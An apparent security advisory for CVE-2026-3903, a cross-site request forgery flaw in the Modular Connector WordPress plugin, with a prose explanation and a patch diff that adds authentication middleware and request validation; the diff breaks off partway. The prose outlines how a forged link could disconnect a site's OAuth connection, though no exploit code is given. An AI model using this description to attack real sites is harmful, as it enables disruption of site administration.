Atomic Edge analysis of CVE-2026-3903:
The vulnerability is a Cross-Site Request Forgery (CSRF) in the Modular Connector WordPress plugin. The root cause is missing nonce validation in the postConfirmOauth() function within the AuthController class. This function handles OAuth/SSO connection confirmation and disconnection requests. The vulnerable endpoint is /wp-admin/admin-ajax.php with the action parameter set to modular_connector_oauth. The plugin’s routing system directs these requests to the postConfirmOauth() method. The function processes OAuth state verification and connection management without verifying the WordPress nonce token that should accompany authenticated administrator actions. The patch adds CSRF protection by implementing nonce validation through the AuthenticateLoopback middleware. The middleware now checks for either an x-mo-authentication header, sig parameter, legacy Authentication header, or a valid nonce parameter. For OAuth requests specifically, the patch adds the AuthenticateLoopback middleware to the /oauth route in src/routes/api.php line 13. This ensures all requests to the postConfirmOauth() function undergo authentication verification. Exploitation requires an attacker to craft a malicious link or form that triggers a GET request to the vulnerable endpoint. When an authenticated administrator visits the malicious page, the forged request executes, disconnecting the plugin’s OAuth/SSO connection. This disrupts the site’s integration with the Modular DS management platform, potentially affecting backup, update, and monitoring functionality. The attack vector is low-privilege as it targets administrators through social engineering rather than technical exploitation.
Published : March 18, 2026
CVE-2026-3903: Modular Connector <= 2.5.1 – Cross-Site Request Forgery via postConfirmOauth (modular-connector)
CVE ID
CVE-2026-3903
Plugin
modular-connector
Severity
Medium
(CVSS 4.3)
CWE
352
Vulnerable Version
2.5.1
Patched Version
2.6.0
Disclosed
March 9, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/modular-connector/init.php
+++ b/modular-connector/init.php
@@ -3,7 +3,7 @@
* Plugin Name: Modular Connector
* Plugin URI: https://modulards.com/herramienta-gestion-webs/
* Description: Connect and manage all your WordPress websites in an easier and more efficient way. Backups, bulk updates, Uptime Monitor, statistics, security, performance, client reports and much more.
- * Version: 2.5.1
+ * Version: 2.6.0
* License: GPL v3.0
* License URI: https://www.gnu.org/licenses/gpl.html
* Requires PHP: 7.4
@@ -20,7 +20,7 @@
define('MODULAR_CONNECTOR_BASENAME', sprintf('%s/%s', basename(dirname(__FILE__)), basename(__FILE__)));
define('MODULAR_CONNECTOR_MU_BASENAME', sprintf('0-%s.php', dirname(MODULAR_CONNECTOR_BASENAME)));
-define('MODULAR_CONNECTOR_VERSION', '2.5.1');
+define('MODULAR_CONNECTOR_VERSION', '2.6.0');
define('MODULAR_ARES_SCHEDULE_HOOK', 'modular_connector_run_schedule');
define('MODULAR_CONNECTOR_STORAGE_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_storage');
define('MODULAR_CONNECTOR_BACKUPS_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_backups');
--- a/modular-connector/modular-php/src/ModularClient.php
+++ b/modular-connector/modular-php/src/ModularClient.php
@@ -2,9 +2,9 @@
namespace ModularSDK;
+use ModularConnectorFacadesServer;
use ModularConnectorDependenciesCarbonCarbon;
use ModularConnectorDependenciesGuzzleHttpClient;
-use ModularConnectorFacadesServer;
use ModularSDKServicesCoreServiceFactory;
use ModularSDKSupportApiHelper;
--- a/modular-connector/modular-php/src/Objects/BaseObject.php
+++ b/modular-connector/modular-php/src/Objects/BaseObject.php
@@ -10,6 +10,7 @@
use ModularConnectorDependenciesIlluminateSupportFacadesDate;
use ModularConnectorDependenciesIlluminateSupportStr;
use ModularSDKModularClient;
+use function ModularConnectorDependenciescollect;
class BaseObject extends BaseObjectFactory implements JsonSerializable, ArrayAccess
{
--- a/modular-connector/modular-php/src/Services/AbstractService.php
+++ b/modular-connector/modular-php/src/Services/AbstractService.php
@@ -4,7 +4,6 @@
use ModularSDKModularClient;
use ModularSDKModularClientInterface;
-use ModularSDKObjectsBaseObject;
use ModularSDKObjectsBaseObjectFactory;
abstract class AbstractService extends BaseObjectFactory
--- a/modular-connector/src/app/Http/Controllers/BackupController.php
+++ b/modular-connector/src/app/Http/Controllers/BackupController.php
@@ -45,9 +45,10 @@
}
/**
+ * @param SiteRequest $modularRequest
* @return IlluminateHttpJsonResponse
*/
- public function getDatabaseTree()
+ public function getDatabaseTree(SiteRequest $modularRequest)
{
$tree = Manager::driver('database')->tree();
@@ -57,9 +58,10 @@
/**
* Returns the backup with the provided $payload name content if existing.
*
+ * @param SiteRequest $modularRequest
* @return IlluminateHttpJsonResponse
*/
- protected function getBackupInformation()
+ protected function getBackupInformation(SiteRequest $modularRequest)
{
$information = Backup::information();
--- a/modular-connector/src/app/Http/Controllers/CacheController.php
+++ b/modular-connector/src/app/Http/Controllers/CacheController.php
@@ -5,11 +5,12 @@
use ModularConnectorCacheJobsCacheClearJob;
use ModularConnectorDependenciesIlluminateRoutingController;
use ModularConnectorDependenciesIlluminateSupportFacadesResponse;
+use ModularSDKObjectsSiteRequest;
use function ModularConnectorDependenciesdispatch;
class CacheController extends Controller
{
- public function clear()
+ public function clear(SiteRequest $modularRequest)
{
dispatch(new CacheClearJob());
--- a/modular-connector/src/app/Http/Controllers/ServerController.php
+++ b/modular-connector/src/app/Http/Controllers/ServerController.php
@@ -19,9 +19,10 @@
class ServerController extends Controller
{
/**
+ * @param SiteRequest $modularRequest
* @return IlluminateHttpJsonResponse
*/
- public function getInformation()
+ public function getInformation(SiteRequest $modularRequest)
{
$information = Server::information();
@@ -56,9 +57,10 @@
}
/**
+ * @param SiteRequest $modularRequest
* @return IlluminateHttpJsonResponse
*/
- public function getWhiteLabel()
+ public function getWhiteLabel(SiteRequest $modularRequest)
{
dispatch(fn() => WhiteLabel::forget());
--- a/modular-connector/src/app/Http/Kernel.php
+++ b/modular-connector/src/app/Http/Kernel.php
@@ -22,17 +22,6 @@
];
/**
- * The application's route middleware.
- *
- * These middleware may be assigned to groups or used individually.
- *
- * @var array
- */
- protected $routeMiddleware = [
- 'auth' => ModularConnectorHttpMiddlewareAuthenticate::class,
- ];
-
- /**
* @param Schedule $schedule
* @return void
* @throws IlluminateContractsContainerBindingResolutionException
--- a/modular-connector/src/app/Http/Middleware/Authenticate.php
+++ b/modular-connector/src/app/Http/Middleware/Authenticate.php
@@ -1,79 +0,0 @@
-<?php
-
-namespace ModularConnectorHttpMiddleware;
-
-use ModularConnectorDependenciesIlluminateContractsAuthFactory as Auth;
-use ModularConnectorDependenciesIlluminateContractsAuthMiddlewareAuthenticatesRequests;
-use ModularConnectorDependenciesIlluminateHttpRequest;
-
-class Authenticate implements AuthenticatesRequests
-{
- /**
- * The authentication factory instance.
- *
- * @var IlluminateContractsAuthFactory
- */
- protected $auth;
-
- /**
- * Create a new middleware instance.
- *
- * @param IlluminateContractsAuthFactory $auth
- * @return void
- */
- public function __construct(Auth $auth)
- {
- $this->auth = $auth;
- }
-
- /**
- * Specify the guards for the middleware.
- *
- * @param string $guard
- * @param string $others
- * @return string
- */
- public static function using($guard, ...$others)
- {
- return static::class . ':' . implode(',', [$guard, ...$others]);
- }
-
- /**
- * Handle an incoming request.
- *
- * @param Request $request
- * @param Closure $next
- * @param mixed ...$guards
- * @return mixed
- */
- public function handle($request, Closure $next, ...$guards)
- {
- $this->authenticate($request, $guards);
-
- return $next($request);
- }
-
- /**
- * Determine if the user is logged in to any of the given guards.
- *
- * @param IlluminateHttpRequest $request
- * @param array $guards
- * @return void
- *
- * @throws IlluminateAuthAuthenticationException
- */
- protected function authenticate($request, array $guards)
- {
- if (empty($guards)) {
- $guards = [null];
- }
-
- foreach ($guards as $guard) {
- if ($this->auth->guard($guard)->check()) {
- return $this->auth->shouldUse($guard);
- }
- }
-
- abort(401);
- }
-}
--- a/modular-connector/src/app/Http/Middleware/AuthenticateLoopback.php
+++ b/modular-connector/src/app/Http/Middleware/AuthenticateLoopback.php
@@ -2,10 +2,10 @@
namespace ModularConnectorHttpMiddleware;
+use ModularConnectorHelperOauthClient;
use ModularConnectorDependenciesAresFrameworkFoundationAuthJWT;
use ModularConnectorDependenciesIlluminateHttpRequest;
use ModularConnectorDependenciesIlluminateSupportFacadesLog;
-use ModularConnectorDependenciesIlluminateSupportFacadesResponse;
use function ModularConnectorDependenciesabort;
use function ModularConnectorDependenciesapp;
@@ -24,7 +24,22 @@
{
$action = app()->getScheduleHook();
- if ($request->hasHeader('Authentication')) {
+ // Check for x-mo-Authentication header or sig parameter (API authentication with client_secret)
+ if ($request->hasHeader('x-mo-authentication') || $request->has('sig')) {
+ $token = $request->hasHeader('x-mo-authentication')
+ ? $request->header('x-mo-authentication', '')
+ : $request->get('sig');
+
+ $source = $request->hasHeader('x-mo-authentication') ? 'header' : 'parameter';
+
+ // Verify JWT with client_secret
+ if (!$this->verifyApiAuthentication($request, $token, $source)) {
+ abort(404);
+ }
+
+ Log::debug("API authentication verified successfully via {$source}");
+ } elseif ($request->hasHeader('Authentication')) {
+ // Legacy Authentication header (uses default hashing key)
$authHeader = $request->header('Authentication', '');
if (!JWT::verify($authHeader, $action)) {
@@ -33,9 +48,10 @@
'header' => $authHeader,
]);
- abort(Response::json(['error' => sprintf('Invalid JWT for %s', $action)], 403));
+ abort(404);
}
} else {
+ // Fallback to nonce validation
$isValid = check_ajax_referer($action, 'nonce', false);
if (!$isValid) {
@@ -44,10 +60,190 @@
'nonce' => $request->input('nonce'),
]);
- abort(Response::json(['error' => sprintf('Invalid NONCE for %s', $action)], 403));
+ abort(404);
}
}
+ Log::debug('Valid authentication for loopback request');
+
return $next($request);
}
+
+ /**
+ * Verify API authentication with client_secret.
+ *
+ * @param Request $request
+ * @param string $token JWT token from header or parameter
+ * @param string $source 'header' or 'parameter'
+ * @return bool
+ */
+ private function verifyApiAuthentication($request, $token, $source)
+ {
+ // Verify token is not empty
+ if (empty($token)) {
+ Log::debug("API auth ({$source}): Token is empty");
+ return false;
+ }
+
+ // Get client_secret from OAuth client
+ $clientSecret = OauthClient::getClient()->getClientSecret();
+
+ // If client_secret is empty, authentication is invalid
+ if (empty($clientSecret)) {
+ Log::debug("API auth ({$source}): client_secret is empty");
+ return false;
+ }
+
+ // Get request data based on route
+ $requestData = $this->getRequestData($request);
+
+ if ($requestData === null) {
+ Log::debug("API auth ({$source}): Unable to get request data");
+ return false;
+ }
+
+ // Verify JWT using client_secret with request data
+ if (!$this->verifyJwtWithData($token, $clientSecret, $requestData)) {
+ Log::debug("API auth ({$source}): Invalid JWT");
+ return false;
+ }
+
+ return true;
+ }
+
+ /**
+ * Get request data based on current route.
+ *
+ * @param Request $request
+ * @return object|array|null
+ */
+ private function getRequestData($request)
+ {
+ $routeName = $request->route()->getName();
+
+ // Special handling for OAuth route
+ if ($routeName === 'modular-connector.oauth') {
+ return (object)[
+ 'code' => $request->get('code'),
+ 'state' => $request->get('state'),
+ ];
+ }
+ // For other routes, get modularRequest from cache
+ $modularRequest = $request->route()->parameter('modular_request');
+
+ if (!$modularRequest) {
+ Log::debug('x-mo-Authentication: modularRequest not found in cache', [
+ 'route' => $routeName,
+ ]);
+ return null;
+ }
+
+ // Validate modularRequest structure
+ $requiredKeys = [
+ 'id',
+ 'request_id',
+ 'type',
+ 'body',
+ 'site_id',
+ 'created_at',
+ 'updated_at',
+ 'deleted_at',
+ 'status',
+ 'expired_at',
+ ];
+
+ /**
+ * @var ModularSDKObjectsSiteRequest $modularRequest
+ */
+ foreach ($requiredKeys as $key) {
+ if (!array_key_exists($key, $modularRequest->attributesToArray())) {
+ Log::debug('x-mo-Authentication: modularRequest missing required key', [
+ 'missing_key' => $key,
+ 'route' => $routeName,
+ ]);
+
+ return null;
+ }
+ }
+
+ // Return the entire modularRequest object for hashing
+ return $modularRequest;
+ }
+
+ /**
+ * Verify JWT signature and integrity.
+ *
+ * Decodes the JWT, regenerates the signature with the same payload and client_secret,
+ * and compares. If signatures match, the JWT is authentic and unmodified.
+ *
+ * @param string $token
+ * @param string $clientSecret
+ * @param object|array $requestData
+ * @return bool
+ */
+ private function verifyJwtWithData($token, $clientSecret, $requestData)
+ {
+ // Remove Bearer prefix
+ $token = str_replace('Bearer ', '', $token);
+ $jwtParts = explode('.', $token);
+
+ if (count($jwtParts) !== 3) {
+ Log::debug('x-mo-Authentication: Invalid JWT structure');
+ return false;
+ }
+
+ [$base64UrlHeader, $base64UrlPayload, $base64UrlSignature] = $jwtParts;
+
+ // Decode header and payload to inspect them
+ $header = json_decode(JWT::base64UrlDecode($base64UrlHeader));
+ $payload = json_decode(JWT::base64UrlDecode($base64UrlPayload));
+
+ if (!$header || !$payload) {
+ Log::debug('x-mo-Authentication: Failed to decode JWT', [
+ 'header_valid' => is_object($header),
+ 'payload_valid' => is_object($payload),
+ ]);
+ return false;
+ }
+
+ Log::debug('x-mo-Authentication: JWT payload decoded', [
+ 'client_id' => $payload->client_id ?? null,
+ 'exp' => $payload->exp ?? null,
+ 'iat' => $payload->iat ?? null,
+ ]);
+
+ // Regenerate signature with the exact same payload
+ // If this matches the received signature, the payload is authentic and unmodified
+ $signatureInput = "$base64UrlHeader.$base64UrlPayload";
+ $expectedSignature = hash_hmac('sha256', $signatureInput, $clientSecret, true);
+ $receivedSignature = JWT::base64UrlDecode($base64UrlSignature);
+
+ if (!hash_equals($expectedSignature, $receivedSignature)) {
+ Log::debug('x-mo-Authentication: JWT signature mismatch - token tampered or wrong secret');
+ return false;
+ }
+
+ Log::debug('x-mo-Authentication: JWT signature valid');
+
+ // Verify expiration
+ $currentTime = time();
+ if ($currentTime > ($payload->exp ?? 0)) {
+ Log::debug('x-mo-Authentication: JWT expired', [
+ 'exp' => $payload->exp,
+ 'now' => $currentTime,
+ ]);
+ return false;
+ }
+
+ // Verify issued at
+ if ($currentTime < ($payload->iat ?? 0)) {
+ Log::debug('x-mo-Authentication: JWT not yet valid', [
+ 'iat' => $payload->iat,
+ 'now' => $currentTime,
+ ]);
+ return false;
+ }
+
+ return true;
+ }
}
--- a/modular-connector/src/app/Providers/RouteServiceProvider.php
+++ b/modular-connector/src/app/Providers/RouteServiceProvider.php
@@ -43,8 +43,13 @@
* @throws PsrContainerContainerExceptionInterface
* @throws PsrContainerNotFoundExceptionInterface
*/
- public function bindOldRoutes($route, $removeQuery = false)
+ public function bindOldRoutes($removeQuery = false)
{
+ $routes = app('router')->getRoutes();
+
+ $route = $routes->getByName('default');
+ $route->bind(request());
+
if (!HttpUtils::isDirectRequest()) {
return $route;
}
@@ -52,8 +57,6 @@
$request = request();
$type = $request->header('x-mo-type', $request->get('type'));
- $routes = app('router')->getRoutes();
-
if ($type === 'request') {
$mrid = $request->header('x-mo-mrid', $request->get('mrid'));
$modularRequest = Cache::driver('array')->get('modularRequest') ?: $this->getModularRequest($mrid);
@@ -90,15 +93,9 @@
$route = $route->bind($request);
if ($removeQuery) {
- $params = $route->parameterNames();
-
- if (in_array('modular_request', $params)) {
- $route->setParameter('modular_request', $modularRequest);
- }
+ $route->setParameter('modular_request', $modularRequest);
}
- }
-
- if ($type === 'oauth') {
+ } else if ($type === 'oauth') {
/**
* @var IlluminateRoutingRoute $route
*/
@@ -110,9 +107,7 @@
}
$route = $route->bind($request);
- }
-
- if ($type === 'lb') {
+ } else if ($type === 'lb') {
/**
* @var IlluminateRoutingRoute $route
*/
--- a/modular-connector/src/routes/api.php
+++ b/modular-connector/src/routes/api.php
@@ -10,15 +10,17 @@
use ModularConnectorHttpControllersWooCommerceController;
use ModularConnectorHttpMiddlewareAuthenticateLoopback;
use ModularConnectorDependenciesIlluminateSupportFacadesRoute;
+use function ModularConnectorDependenciesabort;
Route::get('/oauth', [AuthController::class, 'postConfirmOauth'])
+ ->middleware(AuthenticateLoopback::class)
->name('modular-connector.oauth');
Route::get('/schedule/run', [ServerController::class, 'getLoopback'])
->middleware(AuthenticateLoopback::class)
->name('schedule.run');
-Route::middleware('auth')
+Route::middleware(AuthenticateLoopback::class)
->group(function () {
Route::get('/login/{modular_request}', [AuthController::class, 'getLogin'])
->name('login');
@@ -26,13 +28,13 @@
Route::get('/users/{modular_request}', [AuthController::class, 'getUsers'])
->name('manager.users.index');
- Route::get('/server-information', [ServerController::class, 'getInformation'])
+ Route::get('/server-information/{modular_request}', [ServerController::class, 'getInformation'])
->name('manager.server.information');
Route::get('/server-health/{modular_request}', [ServerController::class, 'getHealth'])
->name('manager.server.health');
- Route::get('/white-label', [ServerController::class, 'getWhiteLabel'])
+ Route::get('/white-label/{modular_request}', [ServerController::class, 'getWhiteLabel'])
->name('manager.whiteLabel.update');
Route::get('/manager/maintenance/{modular_request}', [ServerController::class, 'maintenance'])
@@ -47,7 +49,7 @@
#endregion
#region Cache
- Route::get('/cache/clear', [CacheController::class, 'clear'])
+ Route::get('/cache/clear/{modular_request}', [CacheController::class, 'clear'])
->name('manager.cache.clear');
#endregion
@@ -90,10 +92,10 @@
Route::get('/tree/directory/{modular_request}', [BackupController::class, 'getDirectoryTree'])
->name('manager.directory.tree');
- Route::get('/tree/database', [BackupController::class, 'getDatabaseTree'])
+ Route::get('/tree/database/{modular_request}', [BackupController::class, 'getDatabaseTree'])
->name('manager.database.tree');
- Route::get('/backup/information', [BackupController::class, 'getBackupInformation'])
+ Route::get('/backup/information/{modular_request}', [BackupController::class, 'getBackupInformation'])
->name('manager.backup.information');
Route::get('/backup/{modular_request}', [BackupController::class, 'store'])
@@ -106,3 +108,7 @@
Route::get('/woocommerce/{modular_request}', WooCommerceController::class)
->name('manager.woocommerce.stats');
});
+
+Route::get('default/{modular_request}', function () {
+ abort(404);
+})->name('default');
--- a/modular-connector/vendor/ares/framework/src/Foundation/Auth/JWT.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Auth/JWT.php
@@ -115,6 +115,65 @@
return $action === ModularConnectorDependenciesdata_get($payload, 'action', '');
}
/**
+ * Verify the validity of a JWT token with a custom key.
+ * Used for API authentication with client_secret.
+ *
+ * @param string $token The JWT token to verify.
+ * @param string $key The secret key to use for verification.
+ * @param string|null $expectedAction Optional action to verify in payload.
+ *
+ * @return bool `true` if the token is valid. `false` otherwise
+ * @throws Exception
+ */
+ public static function verifyWithKey($token, $key, $expectedAction = null)
+ {
+ if (!$token) {
+ return false;
+ }
+ // Remove Bearer prefix if present
+ if (Str::contains($token, 'Bearer')) {
+ $token = Str::replace('Bearer ', '', $token);
+ }
+ try {
+ $jwtParts = self::explodeToken($token);
+ $header = json_decode(base64_decode($jwtParts[0]));
+ $payload = json_decode(base64_decode($jwtParts[1]));
+ $signature = self::base64UrlDecode($jwtParts[2]);
+ if (!$header || !$payload) {
+ return false;
+ }
+ // Get algorithm from header
+ $alg = ModularConnectorDependenciesdata_get($header, 'alg');
+ if (!$alg || !isset(self::$SUPPORTED_ALGORITHMS[$alg])) {
+ return false;
+ }
+ // Check signature
+ $base64UrlHeader = $jwtParts[0];
+ $base64UrlPayload = $jwtParts[1];
+ if (!self::verifySignature("{$base64UrlHeader}.{$base64UrlPayload}", $signature, $key, $alg)) {
+ return false;
+ }
+ $currentTime = Carbon::now()->timestamp;
+ // Check expiration
+ $exp = ModularConnectorDependenciesdata_get($payload, 'exp', 0);
+ if ($exp && $currentTime > $exp) {
+ return false;
+ }
+ // Check issued at (not before)
+ $iat = ModularConnectorDependenciesdata_get($payload, 'iat', 0);
+ if ($iat && $currentTime < $iat) {
+ return false;
+ }
+ // Check action if provided
+ if ($expectedAction !== null) {
+ return $expectedAction === ModularConnectorDependenciesdata_get($payload, 'action', '');
+ }
+ return true;
+ } catch (Exception $e) {
+ return false;
+ }
+ }
+ /**
* Separates into an array the different parts of a given JWT token
*
* @param string $token The token to explode.
@@ -137,7 +196,7 @@
*
* @return string The decoded string
*/
- private static function base64UrlDecode($input)
+ public static function base64UrlDecode($input)
{
$remainder = strlen($input) % 4;
if ($remainder) {
--- a/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
@@ -188,8 +188,7 @@
add_action('plugins_loaded', function () use ($kernel, $request) {
try {
// First, we need to search for the route to confirm if it exists and check if the modular request is valid.
- $routes = $this->app->make('router')->getRoutes();
- $route = apply_filters('ares/routes/match', $routes->match($request), false);
+ $route = apply_filters('ares/routes/match', false);
if (HttpUtils::isDirectRequest()) {
if ($route->getName() === 'wordpress') {
// If the route is not found, return false.
--- a/modular-connector/vendor/ares/framework/src/Foundation/Http/HttpUtils.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Http/HttpUtils.php
@@ -64,17 +64,79 @@
public static function isDirectRequest(): bool
{
$request = ModularConnectorDependenciesapp('request');
- $userAgent = $request->header('User-Agent');
- $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
+ // Validate that the request method is GET
+ if (!$request->isMethod('GET')) {
+ return false;
+ }
$originQuery = $request->has('origin') && $request->get('origin') === 'mo';
- $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
+ if (!$originQuery) {
+ return false;
+ }
+ $isFromQuery = $originQuery && $request->has('type');
// When is wp-load.php request
if ($isFromQuery) {
- return true;
- }
- // TODO Now we use Laravel routes but we can't directly use the routes
- $isFromSegment = false && $request->segment(1) === 'api' && $request->segment(2) === 'modular-connector';
- if ($isFromSegment) {
+ // Validate allowed parameters based on type
+ $type = $request->get('type');
+ $origin = $request->get('origin');
+ $allParams = array_keys($request->query->all());
+ // Validate that type only contains allowed values
+ $allowedTypes = ['lb', 'request', 'oauth'];
+ if (!in_array($type, $allowedTypes, true)) {
+ return false;
+ }
+ // Validate that origin is exactly 'mo'
+ if ($origin !== 'mo') {
+ return false;
+ }
+ switch ($type) {
+ case 'request':
+ $allowedParams = ['origin', 'type', 'mrid', 'sig'];
+ break;
+ case 'lb':
+ $allowedParams = ['origin', 'type', 'nonce'];
+ break;
+ case 'oauth':
+ $allowedParams = ['origin', 'code', 'type', 'state'];
+ break;
+ default:
+ return false;
+ }
+ // Check if all parameters are allowed
+ foreach ($allParams as $param) {
+ if (!in_array($param, $allowedParams, true)) {
+ return false;
+ }
+ }
+ // Validate that parameters are not empty (except state)
+ foreach ($allParams as $param) {
+ if ($param === 'state') {
+ continue;
+ }
+ $value = $request->get($param);
+ if ($value === null || $value === '') {
+ return false;
+ }
+ }
+ // Validate that sig parameter and x-mo-Authentication header are mutually exclusive
+ $hasSigParam = $request->has('sig');
+ $hasAuthHeader = $request->hasHeader('x-mo-authentication');
+ if ($hasSigParam && $hasAuthHeader) {
+ return false;
+ }
+ // Validate required headers for oauth type
+ if ($type === 'oauth') {
+ if (!$request->hasHeader('x-mo-authentication')) {
+ return false;
+ }
+ }
+ // Validate required header or parameter for lb type
+ if ($type === 'lb') {
+ $hasAuthHeader = $request->hasHeader('Authentication');
+ $hasNonceParam = $request->has('nonce');
+ if (!$hasAuthHeader && !$hasNonceParam) {
+ return false;
+ }
+ }
return true;
}
return false;
--- a/modular-connector/vendor/ares/framework/src/Foundation/Routing/Router.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Routing/Router.php
@@ -17,7 +17,7 @@
*/
protected function findRoute($request)
{
- $this->current = $route = apply_filters('ares/routes/match', $this->routes->match($request), true);
+ $this->current = $route = apply_filters('ares/routes/match', true);
$route->setContainer($this->container);
$this->container->instance(Route::class, $route);
return $route;
--- a/modular-connector/vendor/ares/framework/src/Foundation/ScreenSimulation.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/ScreenSimulation.php
@@ -105,11 +105,6 @@
$GLOBALS['hook_suffix'] = '';
}
$this->forceCompability();
- // Force login as admin.
- add_action('plugins_loaded', function () {
- // Many premium plugins require the user to be logged in as an admin to detect the license.
- ServerSetup::loginAs();
- }, 1);
if (HttpUtils::isMuPlugin()) {
$this->loadAdmin();
}
--- a/modular-connector/vendor/composer/autoload_classmap.php
+++ b/modular-connector/vendor/composer/autoload_classmap.php
@@ -2271,7 +2271,6 @@
'Modular\Connector\Http\Controllers\ServerController' => $baseDir . '/src/app/Http/Controllers/ServerController.php',
'Modular\Connector\Http\Controllers\WooCommerceController' => $baseDir . '/src/app/Http/Controllers/WooCommerceController.php',
'Modular\Connector\Http\Kernel' => $baseDir . '/src/app/Http/Kernel.php',
- 'Modular\Connector\Http\Middleware\Authenticate' => $baseDir . '/src/app/Http/Middleware/Authenticate.php',
'Modular\Connector\Http\Middleware\AuthenticateLoopback' => $baseDir . '/src/app/Http/Middleware/AuthenticateLoopback.php',
'Modular\Connector\Jobs\ConfigureDriversJob' => $baseDir . '/src/app/Jobs/ConfigureDriversJob.php',
'Modular\Connector\Jobs\Health\ManagerHealthDataJob' => $baseDir . '/src/app/Jobs/Health/ManagerHealthDataJob.php',
--- a/modular-connector/vendor/composer/autoload_files.php
+++ b/modular-connector/vendor/composer/autoload_files.php
@@ -6,25 +6,25 @@
$baseDir = dirname($vendorDir);
return array(
- '5a7bb63098496af4e240e58eddca59a9' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
- '79edd977ef0c925a03e16b7120ad9fa1' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
- 'c0fd8d02f739a0d28b7049eb93a85108' => $vendorDir . '/symfony/deprecation-contracts/function.php',
- 'd50815e6b17c7a303c7b46d4b84940c9' => $vendorDir . '/illuminate/collections/helpers.php',
- '8177eb8452b5f2def74f7a84f10909d2' => $vendorDir . '/symfony/translation/Resources/functions.php',
- 'b7eb17c71b7471b81082198d82ac2eba' => $vendorDir . '/illuminate/support/helpers.php',
- 'db9b6aa0d4216bbe4bdd6a868a1c3c1d' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
- '52cfe9aa590fcc0c1694a7082506e776' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
- '0bb35f30d3329b99bbba5562b870bd30' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
- '9e6a39e0d43293e35d548626a19914e2' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
- '295741e4046be8b88eb525c43c49c565' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
- '20a7a7bcc69040dae36a2066103c03d6' => $vendorDir . '/symfony/string/Resources/functions.php',
- 'e7cce8c90104d8023b8e1924fe68dd45' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
- '93335753ca3dd3d62447d763cb9e59fd' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
- '521df67d2bb70bcfd3578de97168005a' => $vendorDir . '/illuminate/events/functions.php',
- 'a588233e190377a8061b7da35424dbd1' => $vendorDir . '/opis/closure/functions.php',
- 'bf3da3d01950ea9c21c430850c71aeba' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
- '2906cc65cc6372f5dd7a3285a9685bec' => $vendorDir . '/ramsey/uuid/src/functions.php',
- '38b9b292125d0b1d8e77711522c3454e' => $vendorDir . '/ares/framework/src/helpers.php',
- '574554cf4c9c164b356686693c60663e' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
- '4131bf6cb9e01ae628980e80ca81c354' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
+ 'be0e863a0b7d410051e3679684b89d05' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
+ 'cdccba37285717201be0cda22130b7c1' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
+ '4da8a5f965edcd26473fcbf2be82d7d7' => $vendorDir . '/symfony/deprecation-contracts/function.php',
+ '5d7599fb41d4880e3bb858d832901e9a' => $vendorDir . '/illuminate/collections/helpers.php',
+ '91ee1bbb29b3989967f6f8639a6d635d' => $vendorDir . '/symfony/translation/Resources/functions.php',
+ 'b72b50162266450392ddd5c515a75818' => $vendorDir . '/illuminate/support/helpers.php',
+ '9f49441cfe0691e56c9c67bd097c4350' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
+ '2754c0fa2f40527b67501543ab0dae51' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
+ '67396cf9772d27504ccab5def06d1e52' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+ '49299b7cf704dda84b41286413c4d7e4' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
+ '36a37457274e471b69dac0ebf51b90b3' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+ 'e121a84a0c75bdd4c6e143812fa796a1' => $vendorDir . '/symfony/string/Resources/functions.php',
+ 'f758949f401dc2a1f6a702b8afe6dfe4' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
+ '4b27ba2df9dd92700018e46af777f34f' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
+ '5004fdd59b9e9307e6cd434a40d345f8' => $vendorDir . '/illuminate/events/functions.php',
+ '92149af1b8cbd5859e99da0ff318c72f' => $vendorDir . '/opis/closure/functions.php',
+ '929e580c79e3d98067c7165de1418f14' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
+ '2720919b2893441fad9f879d73593754' => $vendorDir . '/ramsey/uuid/src/functions.php',
+ 'c0255d9fc9194fa59c7865314fa4fccd' => $vendorDir . '/ares/framework/src/helpers.php',
+ 'abffc1041942c7350c813eb59081cf24' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
+ '7cb02eee968935cda8344cc3dbfa9620' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
);
--- a/modular-connector/vendor/composer/autoload_static.php
+++ b/modular-connector/vendor/composer/autoload_static.php
@@ -7,27 +7,27 @@
class ComposerStaticInit20dc4b5b6916718faedab6064b350e72
{
public static $files = array (
- '5a7bb63098496af4e240e58eddca59a9' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
- '79edd977ef0c925a03e16b7120ad9fa1' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
- 'c0fd8d02f739a0d28b7049eb93a85108' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
